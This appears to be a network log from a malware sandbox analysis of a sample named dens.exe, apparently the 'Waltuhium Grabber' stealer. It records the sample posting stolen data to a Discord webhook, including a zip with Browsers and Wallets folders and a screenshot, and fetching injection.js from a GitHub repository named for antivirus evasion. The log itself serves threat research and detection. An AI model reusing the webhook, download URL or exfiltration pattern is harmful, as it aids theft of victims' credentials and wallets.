                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-12 23:38:54 UTC282OUTPOST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Content-Length: 1311
                                                                                                                                                                                                                                            2024-11-12 23:38:54 UTC1311OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 77 61 6c 74 75 68 69 75 6d 20 7c 20 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 57 61 6c 74 75 68 69 75 6d 20 47 72 61 62 62 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 57 61 6c 74 75 68 69 75 6d 20 47 72 61 62 62 65 72 20 46 75 6c 6c 20 49 6e 66 6f 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 67 69 74 68 75 62 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22 75 72 6c 22 3a 20 22 77 65 62 68 6f 6f 6b 22 7d 2c 20 22 66 69 65
                                                                                                                                                                                                                                            Data Ascii: {"username": "waltuhium | t.me/waltuhium", "embeds": [{"title": "***Waltuhium Grabber***", "description": "***Waltuhium Grabber Full Info***", "url": "https://t.me/waltuhium", "color": 0, "footer": {"text": "github"}, "thumbnail": {"url": "webhook"}, "fie
                                                                                                                                                                                                                                            2024-11-12 23:38:54 UTC1253INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:54 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731454736
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E828AVbhGugyqVGLPhmHBb5U4Fg1xGA6Tk2O23S2an1hba95j8VNgqPPFdzhBzB1d3ATG1%2Fpf8QHWFwhMOB1zjvKfP2JKvm%2B1Ku3ylPkM4ERbQzOmOnBttRRLJLI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Set-Cookie: __cfruid=b4fe6e672b6a1d8dbc1bc903c4e4d946e08efe60-1731454734; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Set-Cookie: _cfuvid=jksrHuwgi48AtT.0Eupf2voBCFAB43FLFLVhTeE9FnI-1731454734658-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e1a5bbb3d6d3583-DFW
                                                                                                                                                                                                                                            2024-11-12 23:38:54 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.449753162.159.128.2334436500C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-12 23:38:55 UTC281OUTPOST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Content-Length: 438
                                                                                                                                                                                                                                            2024-11-12 23:38:55 UTC438OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 77 61 6c 74 75 68 69 75 6d 20 7c 20 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 57 61 6c 74 75 68 69 75 6d 20 47 72 61 62 62 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 4b 65 79 77 6f 72 64 20 52 65 73 75 6c 74 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 67 69 74 68 75 62 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22 75 72 6c 22 3a 20 22 77 65 62 68 6f 6f 6b 22 7d 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65
                                                                                                                                                                                                                                            Data Ascii: {"username": "waltuhium | t.me/waltuhium", "embeds": [{"title": "***Waltuhium Grabber***", "description": "***Keyword Result***", "url": "https://t.me/waltuhium", "color": 0, "footer": {"text": "github"}, "thumbnail": {"url": "webhook"}, "fields": [{"name
                                                                                                                                                                                                                                            2024-11-12 23:38:55 UTC1257INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:55 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731454736
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JODxRD7CJ9x5uuyA3G0YfusieZaBpUO4%2BbqOIWjAapORqiek10j8s%2FcLVW1hLrP7YtPoEgK4iVRpVb4cf2bHgmLteop%2F3XbRb%2BSTqMCJqRrJtjH8PLOuUd5XJzj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Set-Cookie: __cfruid=9dba5449c019f2fb2e6b326e2136aa66df548017-1731454735; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Set-Cookie: _cfuvid=cKhzjvou17nQeUzv5Xf8o9mP4iIFwtHtb226JZIYU7k-1731454735463-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e1a5bc03bbc2cd2-DFW
                                                                                                                                                                                                                                            2024-11-12 23:38:55 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.449754162.159.138.2324436500C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC485OUTPOST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Cookie: __cfruid=b4fe6e672b6a1d8dbc1bc903c4e4d946e08efe60-1731454734; _cfuvid=jksrHuwgi48AtT.0Eupf2voBCFAB43FLFLVhTeE9FnI-1731454734658-0.0.1.1-604800000
                                                                                                                                                                                                                                            Content-Length: 700699
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=352a3e1a846f481f992618ffec72422d
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC36OUTData Raw: 2d 2d 33 35 32 61 33 65 31 61 38 34 36 66 34 38 31 66 39 39 32 36 31 38 66 66 65 63 37 32 34 32 32 64 0d 0a
                                                                                                                                                                                                                                            Data Ascii: --352a3e1a846f481f992618ffec72422d
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: Content-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip"
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 da 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 42 72 6f 77 73 65 72 73 2f 50 4b 03 04 14 00 00 00 00 00 d8 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 00 00 08 00 d9 94 6c 59 cd a9 5e 08 64 63 0a 00 e2 a5 0a 00 0f 00 00 00 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 6c bb 7b 3c 93 ff ff 3f 7e 6d 26 a7 0a eb 40 25 1b 26 45 5a f2 92 08 9b 43 19 0a 89 26 64 72 88 a8 84 e4 38 46 ca a1 9c e6 58 c9 14 92 73 4e 95 cc a1 72 a6 e6 90 63 42 ce 73 66 07 6c 33 bf f5 7a bf 3f df ef e7 77 bb 7d ff d8 6d db 75 5d b7 eb 7a 5e db fd 71 3f 3c 9f 8f 2b da dc d4 70 8f f0 61 61 00 00 f6 18 61 0c 2c 00 80 9f f7 11 02 08 ee e2 bd d5 25 d1 f5 79 6f 20 1f 0b 43 3d a0 e4 87 14 f5 ef
                                                                                                                                                                                                                                            Data Ascii: PKlYBrowsers/PKlYWallets/PKlY^dcDisplay (1).pngl{<?~m&@%&EZC&dr8FXsNrcBsfl3z?w}mu]z^q?<+paaa,%yo C=
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC16384OUTData Raw: cc d0 fb 50 e1 81 67 43 58 ab 40 f7 aa f8 78 99 b5 07 a2 7a 7d 11 f4 b6 30 c6 c1 c1 0d f2 e3 6d 1f bb d2 47 c1 b5 36 9d dd b2 3b 08 7a 03 4c 94 09 35 ab a6 6f 5f b9 49 8a 9c a3 51 c0 08 b3 ea a8 fa 60 cb 4d 12 b2 8d 28 9a d8 42 e3 3c a0 4b 44 f9 fc f4 3b b5 e1 ec 65 c5 cf 73 b1 66 bf 04 1b a2 4d 1a c4 9f 57 b1 9b e2 5b 78 c8 78 ab 0b cc a8 03 35 41 0b c6 08 86 56 f7 8b 13 ce c9 80 25 63 6c 32 0f bb 9d 87 6c 07 9b 5b 11 ea df 08 77 d5 ee d9 74 89 03 ed 44 38 35 90 3a 5b 08 db 3e 40 a8 5f a8 ef ee 73 d0 80 49 97 b9 9f b8 b8 98 0b de f7 2e df 9f cf cf eb b7 58 48 79 72 b2 0a 51 de e8 b9 60 fc 21 f0 e4 6b ab 6e 5b 37 af 0c b5 54 1b c3 c7 60 cf f2 7f d7 43 7f 8d f5 f9 f3 8f 3b 47 e7 e0 d4 ff f3 78 6c 29 ec 98 3c 10 1f f0 59 61 69 ba 3e dd c2 c6 10 d5 27 a1 3f
                                                                                                                                                                                                                                            Data Ascii: PgCX@xz}0mG6;zL5o_IQ`M(B<KD;esfMW[xx5AV%cl2l[wtD85:[>@_sI.XHyrQ`!kn[7T`C;Gxl)<Yai>'?
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC16384OUTData Raw: 92 9d e6 f1 0c 33 1e 36 9c 5f 90 29 09 c6 22 96 de aa d8 76 7a 23 38 2a f4 ec 37 e6 3f 9c 8c cb 54 f4 40 0f e6 7d a2 18 7f 52 f8 75 35 bf 31 85 9c 29 85 d9 30 e9 33 71 23 6e 65 20 f2 72 d5 bf 25 ae 51 a7 37 cf 7c f7 86 a4 28 b2 8b 5b 69 f2 f1 24 65 2e a2 de 33 89 79 a1 a0 dd f5 02 b9 cb 0e 7d dc ec c4 b0 f7 50 53 b5 a5 12 ac 67 1b 01 11 d7 1b af a7 e9 b8 b2 8a 7a 0f 65 e7 ed 9b fc c8 c1 0d 86 3b 5f 12 e3 fc ec 0f b1 d8 3b 4c a1 3a d8 d0 37 93 fb ad ba f7 9e d2 e9 43 f5 69 dd ea db a3 cf 7f bd ac 4f bc 50 3f d9 fe 7c 2a bf f7 52 69 32 a0 36 97 3c 6e 22 9d ea ed ad fa 68 37 b1 1f c4 2e 12 dd 34 ae 5f f7 fc a6 f7 5c 22 c2 b8 a8 1f ff c6 c6 a9 ee 5b 9b 10 a2 f9 61 dd e9 bb d9 71 1d cf 3a 95 92 b6 0d e0 26 a7 56 3e 2c 49 55 66 3b ad aa 3f d5 3d 50 7f 56 55 a1
                                                                                                                                                                                                                                            Data Ascii: 36_)"vz#8*7?T@}Ru51)03q#ne r%Q7|([i$e.3y}PSgze;_;L:7CiOP?|*Ri26<n"h7.4_\"[aq:&V>,IUf;?=PVU
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC16384OUTData Raw: 64 eb 5c 46 58 b3 0e 3f 02 0e 4c 2d 3c 33 ec da a9 2c df fb bc db 5e b3 39 2f 70 18 34 16 73 4a 31 97 90 33 5e 96 ca d8 89 5b 20 a9 61 b9 a7 1d 5c a8 3c b1 4f b6 77 66 e9 58 e6 13 05 ce b8 e0 b8 2d f2 bd 5b ae 24 52 36 c3 f3 c4 e4 5a f7 c2 af a4 16 8b 2c 47 53 ba e3 43 5f f4 76 75 75 45 4b 6c 28 35 4b c6 0a fb 94 7d 43 c7 52 8a 9f b2 d2 4e 86 3a 50 22 81 32 20 91 e2 b6 52 86 50 60 1d 63 46 e5 56 da e6 ce f2 3b 86 5e 2e 8e 70 9d e2 66 8b 26 a5 64 39 ea 70 c5 6e a3 17 71 03 0c 4e 91 5a d5 18 2e 77 cf c2 ed 95 4a ee bc 06 42 f1 7d a0 00 b2 8f 25 af 1d 8b 14 ce 98 9d 38 3a 65 cb 29 22 6c 04 45 c8 d0 fe 33 a2 ff 2f b3 bf 86 7a df 07 04 c8 2d 2d ec bb d2 9c 56 b0 43 70 8e 8a ed 51 eb bd 3c 37 15 ea c4 85 0e b1 8a a7 4e a8 1e 11 0e fe a7 1f 14 0b 60 bc 63 36 79
                                                                                                                                                                                                                                            Data Ascii: d\FX?L-<3,^9/p4sJ13^[ a\<OwfX-[$R6Z,GSC_vuuEKl(5K}CRN:P"2 RP`cFV;^.pf&d9pnqNZ.wJB}%8:e)"lE3/z--VCpQ<7N`c6y
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC16384OUTData Raw: 77 d8 82 6c bb 13 5f c4 21 a1 b3 bc 8f bb 72 ce 9b f3 09 87 b2 3a 4b da 20 36 84 8c 1a 0d 7c ae 93 fe b9 f5 81 e8 5e 31 64 72 68 4a 74 c3 6c ca 16 a4 87 7b 66 00 8b c8 dd ed 56 d2 c9 ee 51 3f d4 2e bd f8 08 b3 bd b3 d1 32 ec de 57 74 98 af 0d 61 c4 db 4a 57 63 02 82 76 37 85 6b 14 05 5e 16 fc 39 48 dc 0b a4 33 76 41 0a 13 ee a7 33 a1 a3 da ca 28 eb 1b 28 bf 8b 81 23 b3 9b b9 65 d7 56 0c c1 a6 76 ba b7 a9 8b b0 72 e3 8a 2c 01 d6 1b 4a 15 d9 f9 ee dc be 6c 3d cf b6 33 6b 9d 0f d5 27 83 97 ee c7 c7 56 c1 8c 1d 72 67 28 20 ae 71 23 36 7b d1 48 6b 92 28 84 05 4d 25 a7 75 75 94 0e fb 70 48 f4 c7 60 6c f2 90 63 64 96 0c 94 13 59 58 9a 2f 79 9c f0 b7 64 cc 9f 23 7a b5 5d 06 c9 01 b5 1e 0b e3 33 a1 0f d0 83 fd d6 07 9b ea 47 e9 09 74 8f b8 f0 e0 fe 0b 88 58 ab ba
                                                                                                                                                                                                                                            Data Ascii: wl_!r:K 6|^1drhJtl{fVQ?.2WtaJWcv7k^9H3vA3((#eVvr,Jl=3k'Vrg( q#6{Hk(M%uupH`lcdYX/yd#z]3GtX
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC16384OUTData Raw: f7 a1 ee 75 b9 3f fd 99 94 48 d0 bb fc 41 e1 59 50 db 19 81 65 fb c6 d1 66 25 3a 88 80 f3 7d 65 5e 58 96 39 58 78 bb 84 b0 20 21 b7 09 3c 58 16 da 6c 93 97 38 e6 73 0b 19 8f eb d5 05 48 c7 1a ae 82 ce e7 de 8d 9d a9 af a0 85 e4 58 20 98 54 c3 04 30 69 55 af 5b ca 66 61 7c b9 73 b7 c6 26 50 bb 49 2e 8c 8f 73 6e 9b f8 9d 08 a4 06 49 10 92 fd 71 99 3c f8 ec 57 bc e6 e4 46 75 b3 e8 eb 62 17 ef 77 f2 e0 45 99 94 bd 38 2e 3f 97 01 63 4b d1 ed 0b ea 6f f1 0b 2a 27 cd d6 61 52 9a 39 d4 e5 12 80 63 6a d7 99 7a c3 17 e9 32 fa cd f7 52 39 f4 71 ee 30 d6 17 f0 e7 4c db b6 c4 e5 26 e5 58 fc ed 14 98 c8 06 27 54 9f 24 c3 9f b9 6a 33 b5 05 92 eb 39 91 de a6 ad bc 10 46 77 2e a7 00 e6 86 72 70 f3 c9 5b aa 2e 09 a9 8c e5 a7 79 4e eb 14 70 5e 9f 1b 79 b2 e5 ce 8e c4 d7 e5
                                                                                                                                                                                                                                            Data Ascii: u?HAYPef%:}e^X9Xx !<Xl8sHX T0iU[fa|s&PI.snIq<WFubwE8.?cKo*'aR9cjz2R9q0L&X'T$j39Fw.rp[.yNp^y
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC16384OUTData Raw: 06 d3 d1 1c 06 19 1a 7c af 7a 8b 74 34 c0 56 dc 03 db c8 f8 46 12 21 0a 30 5e f0 cc ca 30 5c 96 db 15 c5 14 b3 33 58 14 99 bb e1 1e d7 89 66 96 40 88 32 f7 b9 76 bc fc 55 1e 53 03 1d 5e 83 b9 18 ed 7b 69 98 39 10 06 22 2f fc 4c 55 cf 13 0f 4e 22 b0 a3 6c d7 88 c4 89 90 62 c0 78 d5 04 64 7a 77 aa b4 eb 7c de 4f 33 a2 04 72 66 d6 a3 be b4 18 9c ac 1f 22 2e 6b ed bf 3e 63 b9 dd ff b4 ff 19 f8 5d 5a 38 6f d3 c8 49 e4 35 b7 9c 20 fe 0d 2e c7 c3 06 53 24 85 f7 c9 61 37 65 0a 9e f1 9d b9 9d 1e d6 ad d7 76 cc e3 b1 8b 0a a0 50 6e f5 2d cb e7 72 8f 87 74 88 43 f6 59 e5 04 02 a7 47 71 7e 40 11 4a 34 dc 91 a6 af 83 b9 27 e5 f3 96 1d 37 56 cc 5a 9a 2a d3 5a f6 d6 63 cb ce fb 5a 46 03 92 04 aa cc 45 ce 7c c6 4f 6b de 8f 8e a5 f6 ac dc 11 33 e2 1a 7e 60 2c 7c b7 ba 17
                                                                                                                                                                                                                                            Data Ascii: |zt4VF!0^0\3Xf@2vUS^{i9"/LUN"lbxdzw|O3rf".k>c]Z8oI5 .S$a7evPn-rtCYGq~@J4'7VZ*ZcZFE|Ok3~`,|
                                                                                                                                                                                                                                            2024-11-12 23:38:56 UTC16384OUTData Raw: c0 0e 12 48 9e 30 90 00 7f fb ee 15 b1 3b 35 ff 24 01 30 b3 1d ab 3d 91 8e 1b f3 00 da a3 3c 36 d4 03 57 d3 7f 61 f0 04 8d 68 04 4e ac e4 8e b6 0e e2 c2 3b ef 18 ea 2a 9e 0a 01 6a 4a db b2 7a e9 34 25 18 cf 63 73 2a 4e 4f aa 35 7b b7 7f 5b bf 5d de 72 bb 7a e3 02 c7 22 7d 12 ff e6 f5 56 3f 4e 97 24 a7 c0 46 ea 6c 72 9e c4 b8 7e ca 61 f5 da 4b 1e 27 f4 16 de 3e 54 08 c8 bd 0a 97 a9 94 ac d4 0c f0 1a 7c 84 2c 4b 97 65 42 b6 95 6f 57 94 fe 95 f2 57 ac 3f 1d 20 85 ef d1 06 19 c5 9c 5c fa 6e 0d 5e 37 7a ea 67 fc 1b ca 61 1d 3d dd c2 77 f5 04 2c ef 9d 6a f9 1f 7c bd 5f 1e cc 1d 13 a7 d9 9b dc bb e6 ff cc b6 60 37 ef 27 1f 78 e2 b0 fd 0d 0a 73 ab 24 03 62 f9 83 bf b3 5b 98 b6 93 f6 89 13 78 ce 25 6a 10 f6 5e 96 ed c2 1d f6 8e 34 46 03 f8 35 ff a2 13 f7 46 d6 cc
                                                                                                                                                                                                                                            Data Ascii: H0;5$0=<6WahN;*jJz4%cs*NO5{[]rz"}V?N$Flr~aK'>T|,KeBoWW? \n^7zga=w,j|_`7'xs$b[x%j^4F5F
                                                                                                                                                                                                                                            2024-11-12 23:38:57 UTC956INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:57 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731454738
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXwzgwwbEGRs1xEifo4GwpCxmbqG7m%2F1ZIUpQCJYe0HNKbi07rOlEItVnZCnTm31pRqOTdvgr1dg0kq0sAUYnBcBDjc3bA2WrJcC5U5Mn0GzVCAq71rsrSmEL9CN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e1a5bc5abe93160-DFW


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.449757185.199.108.1334436500C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC186OUTGET /antivirusevasion23/injection/main/injection.js HTTP/1.1
                                                                                                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC900INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Content-Length: 29588
                                                                                                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                            ETag: "2547a391b86f469cdb5036789d86ca9d30a0086b3059ced3d8bae20330bee446"
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            X-GitHub-Request-Id: 9C6F:245694:E036C:ED820:6733E710
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:58 GMT
                                                                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                                                                            X-Served-By: cache-dfw-ktki8620051-DFW
                                                                                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                                                                                                            X-Timer: S1731454738.103605,VS0,VE119
                                                                                                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                            X-Fastly-Request-ID: 063f0bd8d77beb1225b57c3775dbca8ef14ad222
                                                                                                                                                                                                                                            Expires: Tue, 12 Nov 2024 23:43:58 GMT
                                                                                                                                                                                                                                            Source-Age: 0
